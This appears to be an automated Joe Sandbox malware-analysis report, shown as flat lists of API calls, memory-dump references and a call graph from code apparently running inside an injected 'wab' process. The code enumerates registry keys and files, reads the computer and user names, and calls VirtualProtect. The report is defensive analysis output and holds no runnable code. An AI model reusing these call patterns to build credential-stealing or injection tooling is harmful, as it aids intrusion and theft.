                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7726DF80,?,0041755F,?), ref: 00417478
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$??3@malloc
                                                  • String ID:
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                  • RegisterClassW.USER32(?), ref: 00412428
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                  • String ID:
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00409B40
                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Item
                                                  • String ID:
                                                  APIs
                                                  • memset.MSVCRT ref: 00417B7B
                                                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                  • GetLastError.KERNEL32 ref: 00417BB5
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastLockUnlockmemset
                                                  • String ID:
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                  • malloc.MSVCRT ref: 00417407
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$??3@malloc
                                                  • String ID:
                                                  APIs
                                                  • memset.MSVCRT ref: 0040F673
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                  • strlen.MSVCRT ref: 0040F6A2
                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  APIs
                                                  • memset.MSVCRT ref: 0040F6E2
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                  • strlen.MSVCRT ref: 0040F70D
                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  APIs
                                                  • memset.MSVCRT ref: 00402FD7
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                  • strlen.MSVCRT ref: 00403006
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  APIs
                                                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                  • GetStockObject.GDI32(00000000), ref: 004143C6
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                  • String ID:
                                                  APIs
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Time$System$File$LocalSpecific
                                                  • String ID:
                                                  APIs
                                                  • memcpy.MSVCRT ref: 004134E0
                                                  • memcpy.MSVCRT ref: 004134F2
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$DialogHandleModuleParam
                                                  • String ID:
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  APIs
                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: InvalidateMessageRectSend
                                                  • String ID: d=E
                                                  APIs
                                                  • wcschr.MSVCRT ref: 0040F79E
                                                  • wcschr.MSVCRT ref: 0040F7AC
                                                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                    • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcschr$memcpywcslen
                                                  • String ID: "
                                                  • API String ID: 1983396471-123907689
                                                  APIs
                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                  • _memicmp.MSVCRT ref: 0040C00D
                                                  • memcpy.MSVCRT ref: 0040C024
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FilePointer_memicmpmemcpy
                                                  • String ID: URL
                                                  • API String ID: 2108176848-3574463123
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfmemcpy
                                                  • String ID: %2.2X
                                                  • API String ID: 2789212964-323797159
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintf
                                                  • String ID: %%-%d.%ds
                                                  • API String ID: 3988819677-2008345750
                                                  APIs
                                                  • memset.MSVCRT ref: 0040E770
                                                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSendmemset
                                                  • String ID: F^@
                                                  • API String ID: 568519121-3652327722
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PlacementWindowmemset
                                                  • String ID: WinPos
                                                  • API String ID: 4036792311-2823255486
                                                  APIs
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                  • wcsrchr.MSVCRT ref: 0040DCE9
                                                  • wcscat.MSVCRT ref: 0040DCFF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                  • String ID: _lng.ini
                                                  • API String ID: 383090722-1948609170
                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                  • API String ID: 2773794195-880857682
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID:
                                                  • API String ID: 438689982-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$memset
                                                  • String ID:
                                                  • API String ID: 1860491036-0
                                                  APIs
                                                  • memcmp.MSVCRT ref: 00408AF3
                                                    • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                  • memcmp.MSVCRT ref: 00408B2B
                                                  • memcmp.MSVCRT ref: 00408B5C
                                                  • memcpy.MSVCRT ref: 00408B79
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmp$memcpy
                                                  • String ID:
                                                  • API String ID: 231171946-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcslen$wcscat$wcscpy
                                                  • String ID:
                                                  • API String ID: 1961120804-0

                                                  Execution Graph

                                                  Execution Coverage:2.4%
                                                  Dynamic/Decrypted Code Coverage:20.5%
                                                  Signature Coverage:0.5%
                                                  Total number of Nodes:844
                                                  Total number of Limit Nodes:16
33862->33988 33989 40466b _mbscpy 33864->33989 33868 4039aa 33870 4039ff 33868->33870 33990 40f460 memset memset 33868->33990 34011 40f6e2 33868->34011 34027 4038e8 21 API calls 33868->34027 33871 404785 FreeLibrary 33870->33871 33872 403a0b 33871->33872 33873 4037ca memset memset 33872->33873 34035 444551 memset 33873->34035 33875 4038e2 33875->33718 33939 40f334 334 API calls 33875->33939 33878 40382e 33879 406f06 2 API calls 33878->33879 33880 403843 33879->33880 33881 406f06 2 API calls 33880->33881 33882 403855 strchr 33881->33882 33883 403884 _mbscpy 33882->33883 33884 403897 strlen 33882->33884 33885 4038bf _mbscpy 33883->33885 33884->33885 33886 4038a4 sprintf 33884->33886 34047 4023e5 16 API calls 33885->34047 33886->33885 33889 44b090 33888->33889 33890 40fb10 RegOpenKeyExA 33889->33890 33891 403e7f 33890->33891 33892 40fb3b RegOpenKeyExA 33890->33892 33902 40f96c 33891->33902 33893 40fb55 RegQueryValueExA 33892->33893 33894 40fc2d RegCloseKey 33892->33894 33895 40fc23 RegCloseKey 33893->33895 33896 40fb84 33893->33896 33894->33891 33895->33894 33897 404734 3 API calls 33896->33897 33898 40fb91 33897->33898 33898->33895 33899 40fc19 LocalFree 33898->33899 33900 40fbdd memcpy memcpy 33898->33900 33899->33895 34052 40f802 11 API calls 33900->34052 33903 4070ae GetVersionExA 33902->33903 33904 40f98d 33903->33904 33905 4045db 7 API calls 33904->33905 33913 40f9a9 33905->33913 33906 40fae6 33907 404656 FreeLibrary 33906->33907 33908 403e85 33907->33908 33914 4442ea memset 33908->33914 33909 40fa13 memset WideCharToMultiByte 33910 40fa43 _strnicmp 33909->33910 33909->33913 33911 40fa5b WideCharToMultiByte 33910->33911 33910->33913 33912 40fa88 WideCharToMultiByte 33911->33912 33911->33913 33912->33913 33913->33906 33913->33909 33915 410dbb 9 API calls 33914->33915 33916 444329 33915->33916 34053 40759e strlen strlen 33916->34053 33921 410dbb 9 API calls 33922 444350 33921->33922 33923 40759e 3 API calls 33922->33923 33924 44435a 33923->33924 33925 444212 65 
API calls 33924->33925 33926 444366 memset memset 33925->33926 33927 410b1e 3 API calls 33926->33927 33928 4443b9 ExpandEnvironmentStringsA strlen 33927->33928 33929 4443f4 _strcmpi 33928->33929 33930 4443e5 33928->33930 33931 403e91 33929->33931 33932 44440c 33929->33932 33930->33929 33931->33509 33933 444212 65 API calls 33932->33933 33933->33931 33934->33680 33935->33684 33936->33692 33937->33696 33938->33700 33939->33718 33940->33720 33941->33745 33942->33749 33943->33742 33945 40841c 33944->33945 33946 410a9c RegOpenKeyExA 33945->33946 33946->33758 33947->33764 33948->33764 33949->33768 33950->33770 33951->33764 33952->33773 33953->33779 33954->33779 33955->33782 33956->33779 33958 404656 FreeLibrary 33957->33958 33959 4045e3 LoadLibraryA 33958->33959 33960 404651 33959->33960 33961 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33959->33961 33960->33785 33960->33789 33962 40463d 33961->33962 33963 404643 33962->33963 33964 404656 FreeLibrary 33962->33964 33963->33960 33964->33960 33966 403cd2 33965->33966 33967 40465c FreeLibrary 33965->33967 33966->33798 33967->33966 33968->33795 33969->33802 33970->33807 33971->33811 33972->33812 33973->33807 33974->33807 33975->33807 33976->33827 33977->33840 33978->33840 33979->33840 33980->33840 33981->33845 33982->33847 33983->33848 33984->33852 33985->33853 33986->33853 33987->33862 33988->33859 33989->33868 34028 4078ba 33990->34028 33993 4078ba _mbsnbcat 33994 40f5a3 RegOpenKeyExA 33993->33994 33995 40f5c3 RegQueryValueExA 33994->33995 33996 40f6d9 33994->33996 33997 40f6d0 RegCloseKey 33995->33997 33998 40f5f0 33995->33998 33996->33868 33997->33996 33998->33997 33999 40f675 33998->33999 34032 40466b _mbscpy 33998->34032 33999->33997 34033 4012ee strlen 33999->34033 34001 40f611 34003 404734 3 API calls 34001->34003 34008 40f616 34003->34008 34004 40f69e RegQueryValueExA 34004->33997 34005 40f6c1 34004->34005 34005->33997 34006 40f66a 34007 404785 FreeLibrary 34006->34007 
34007->33999 34008->34006 34009 40f661 LocalFree 34008->34009 34010 40f645 memcpy 34008->34010 34009->34006 34010->34009 34034 40466b _mbscpy 34011->34034 34013 40f6fa 34014 4045db 7 API calls 34013->34014 34015 40f708 34014->34015 34016 404734 3 API calls 34015->34016 34021 40f7e2 34015->34021 34022 40f715 34016->34022 34017 404656 FreeLibrary 34018 40f7f1 34017->34018 34019 404785 FreeLibrary 34018->34019 34020 40f7fc 34019->34020 34020->33868 34021->34017 34022->34021 34023 40f797 WideCharToMultiByte 34022->34023 34024 40f7b8 strlen 34023->34024 34025 40f7d9 LocalFree 34023->34025 34024->34025 34026 40f7c8 _mbscpy 34024->34026 34025->34021 34026->34025 34027->33868 34029 4078e6 34028->34029 34030 4078c7 _mbsnbcat 34029->34030 34031 4078ea 34029->34031 34030->34029 34031->33993 34032->34001 34033->34004 34034->34013 34048 410a9c RegOpenKeyExA 34035->34048 34037 40381a 34037->33875 34046 4021b6 memset 34037->34046 34038 44458b 34038->34037 34049 410add RegQueryValueExA 34038->34049 34040 4445a4 34041 4445dc RegCloseKey 34040->34041 34050 410add RegQueryValueExA 34040->34050 34041->34037 34043 4445c1 34043->34041 34051 444879 30 API calls 34043->34051 34045 4445da 34045->34041 34046->33878 34047->33875 34048->34038 34049->34040 34050->34043 34051->34045 34052->33899 34054 4075c9 34053->34054 34055 4075bb _mbscat 34053->34055 34056 444212 34054->34056 34055->34054 34073 407e9d 34056->34073 34059 44424d 34060 444274 34059->34060 34061 444258 34059->34061 34081 407ef8 34059->34081 34062 407e9d 9 API calls 34060->34062 34094 444196 52 API calls 34061->34094 34069 4442a0 34062->34069 34064 407ef8 9 API calls 34064->34069 34065 4442ce 34091 407f90 34065->34091 34069->34064 34069->34065 34071 444212 65 API calls 34069->34071 34095 407e62 strcmp strcmp 34069->34095 34070 407f90 FindClose 34072 4442e4 34070->34072 34071->34069 34072->33921 34074 407f90 FindClose 34073->34074 34075 407eaa 34074->34075 34076 406f06 2 API calls 34075->34076 34077 407ebd strlen strlen 
34076->34077 34078 407ee1 34077->34078 34079 407eea 34077->34079 34096 4070e3 strlen _mbscat _mbscpy _mbscat 34078->34096 34079->34059 34082 407f03 FindFirstFileA 34081->34082 34083 407f24 FindNextFileA 34081->34083 34084 407f3f 34082->34084 34085 407f46 strlen strlen 34083->34085 34086 407f3a 34083->34086 34084->34085 34088 407f7f 34084->34088 34085->34088 34089 407f76 34085->34089 34087 407f90 FindClose 34086->34087 34087->34084 34088->34059 34097 4070e3 strlen _mbscat _mbscpy _mbscat 34089->34097 34092 407fa3 34091->34092 34093 407f99 FindClose 34091->34093 34092->34070 34093->34092 34094->34059 34095->34069 34096->34079 34097->34088 34098->33523 34099->33527 34100->33533 34101->33535 34102->33540 34103->33537 34104->33532 34113 411853 RtlInitializeCriticalSection memset 34114 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34287 40a256 13 API calls 34289 432e5b 17 API calls 34291 43fa5a 20 API calls 34116 401060 41 API calls 34294 427260 CloseHandle memset memset 33197 410c68 FindResourceA 33198 410c81 SizeofResource 33197->33198 33200 410cae 33197->33200 33199 410c92 LoadResource 33198->33199 33198->33200 33199->33200 33201 410ca0 LockResource 33199->33201 33201->33200 34296 405e69 14 API calls 34121 433068 15 API calls 34298 414a6d 18 API calls 34299 43fe6f 134 API calls 34123 424c6d 15 API calls 34300 426741 19 API calls 34125 440c70 17 API calls 34126 443c71 44 API calls 34129 427c79 24 API calls 34303 416e7e memset 34133 42800b 47 API calls 34134 425115 85 API calls 34306 41960c 61 API calls 34135 43f40c 122 API calls 34138 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34139 43f81a 20 API calls 34141 414c20 memset memset 34142 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34310 414625 18 API calls 34311 404225 modf 34312 403a26 strlen WriteFile 34314 40422a 12 API calls 34318 427632 memset memset memcpy 34319 40ca30 59 API calls 34320 404235 26 API calls 34143 42ec34 61 API calls 34144 
425115 76 API calls 34321 425115 77 API calls 34323 44223a 38 API calls 34150 43183c 112 API calls 34324 44b2c5 _onexit __dllonexit 34329 42a6d2 memcpy 34152 405cda 65 API calls 34337 43fedc 138 API calls 34338 4116e1 16 API calls 34155 4244e6 19 API calls 34157 42e8e8 127 API calls 34158 4118ee RtlLeaveCriticalSection 34343 43f6ec 22 API calls 34160 425115 119 API calls 33187 410cf3 EnumResourceNamesA 34346 4492f0 memcpy memcpy 34348 43fafa 18 API calls 34350 4342f9 15 API calls 34161 4144fd 19 API calls 34352 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34353 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34356 443a84 _mbscpy 34358 43f681 17 API calls 34164 404487 22 API calls 34360 415e8c 16 API calls 34168 411893 RtlDeleteCriticalSection 34169 41a492 42 API calls 34364 403e96 34 API calls 34365 410e98 memset SHGetPathFromIDList SendMessageA 34171 426741 109 API calls 34172 4344a2 18 API calls 34173 4094a2 10 API calls 34368 4116a6 15 API calls 34369 43f6a4 17 API calls 34370 440aa3 20 API calls 34372 427430 45 API calls 34176 4090b0 7 API calls 34177 4148b0 15 API calls 34179 4118b4 RtlEnterCriticalSection 34180 4014b7 CreateWindowExA 34181 40c8b8 19 API calls 34183 4118bf RtlTryEnterCriticalSection 34377 42434a 18 API calls 34379 405f53 12 API calls 34191 43f956 59 API calls 34193 40955a 17 API calls 34194 428561 36 API calls 34195 409164 7 API calls 34383 404366 19 API calls 34387 40176c ExitProcess 34390 410777 42 API calls 34200 40dd7b 51 API calls 34201 425d7c 16 API calls 34392 43f6f0 25 API calls 34393 42db01 22 API calls 34202 412905 15 API calls 34394 403b04 54 API calls 34395 405f04 SetDlgItemTextA GetDlgItemTextA 34396 44b301 ??3@YAXPAX 34399 4120ea 14 API calls 34400 40bb0a 8 API calls 34402 413f11 strcmp 34206 434110 17 API calls 34209 425115 108 API calls 34403 444b11 _onexit 34211 425115 76 API calls 34214 429d19 10 API calls 34406 444b1f __dllonexit 34407 409f20 _strcmpi 34216 42b927 31 API calls 34410 
433f26 19 API calls 34411 44b323 FreeLibrary 34412 427f25 46 API calls 34413 43ff2b 17 API calls 34414 43fb30 19 API calls 34223 414d36 16 API calls 34225 40ad38 7 API calls 34416 433b38 16 API calls 34417 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34229 426741 21 API calls 34230 40c5c3 125 API calls 34232 43fdc5 17 API calls 34418 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34235 4161cb memcpy memcpy memcpy memcpy 33202 44b3cf 33203 44b3e6 33202->33203 33205 44b454 33202->33205 33203->33205 33209 44b40e 33203->33209 33206 44b405 33206->33205 33207 44b435 VirtualProtect 33206->33207 33207->33205 33208 44b444 VirtualProtect 33207->33208 33208->33205 33210 44b413 33209->33210 33212 44b454 33210->33212 33216 44b42b 33210->33216 33213 44b41c 33213->33212 33214 44b435 VirtualProtect 33213->33214 33214->33212 33215 44b444 VirtualProtect 33214->33215 33215->33212 33217 44b431 33216->33217 33218 44b435 VirtualProtect 33217->33218 33220 44b454 33217->33220 33219 44b444 VirtualProtect 33218->33219 33218->33220 33219->33220 34423 43ffc8 18 API calls 34236 4281cc 15 API calls 34425 4383cc 110 API calls 34237 4275d3 41 API calls 34426 4153d3 22 API calls 34238 444dd7 _XcptFilter 34431 4013de 15 API calls 34433 425115 111 API calls 34434 43f7db 18 API calls 34437 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34240 4335ee 16 API calls 34439 429fef 11 API calls 34241 444deb _exit _c_exit 34440 40bbf0 138 API calls 34244 425115 79 API calls 34444 437ffa 22 API calls 34248 4021ff 14 API calls 34249 43f5fc 149 API calls 34445 40e381 9 API calls 34251 405983 40 API calls 34252 42b186 27 API calls 34253 427d86 76 API calls 34254 403585 20 API calls 34256 42e58e 18 API calls 34259 425115 75 API calls 34261 401592 8 API calls 33188 410b92 33191 410a6b 33188->33191 33190 410bb2 33192 410a77 33191->33192 33193 410a89 GetPrivateProfileIntA 33191->33193 33196 410983 memset _itoa WritePrivateProfileStringA 33192->33196 33193->33190 33195 410a84 
33195->33190 33196->33195 34449 434395 16 API calls 34263 441d9c memcmp 34451 43f79b 119 API calls 34264 40c599 43 API calls 34452 426741 87 API calls 34268 4401a6 21 API calls 34270 426da6 memcpy memset memset memcpy 34271 4335a5 15 API calls 34273 4299ab memset memset memcpy memset memset 34274 40b1ab 8 API calls 34457 425115 76 API calls 34461 4113b2 18 API calls 34465 40a3b8 memset sprintf SendMessageA 33221 410bbc 33224 4109cf 33221->33224 33225 4109dc 33224->33225 33226 410a23 memset GetPrivateProfileStringA 33225->33226 33227 4109ea memset 33225->33227 33232 407646 strlen 33226->33232 33237 4075cd sprintf memcpy 33227->33237 33230 410a0c WritePrivateProfileStringA 33231 410a65 33230->33231 33233 40765a 33232->33233 33235 40765c 33232->33235 33233->33231 33234 4076a3 33234->33231 33235->33234 33238 40737c strtoul 33235->33238 33237->33230 33238->33235 34276 40b5bf memset memset _mbsicmp

                                                  Control-flow Graph

                                                  control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                  APIs
                                                  • memset.MSVCRT ref: 0040832F
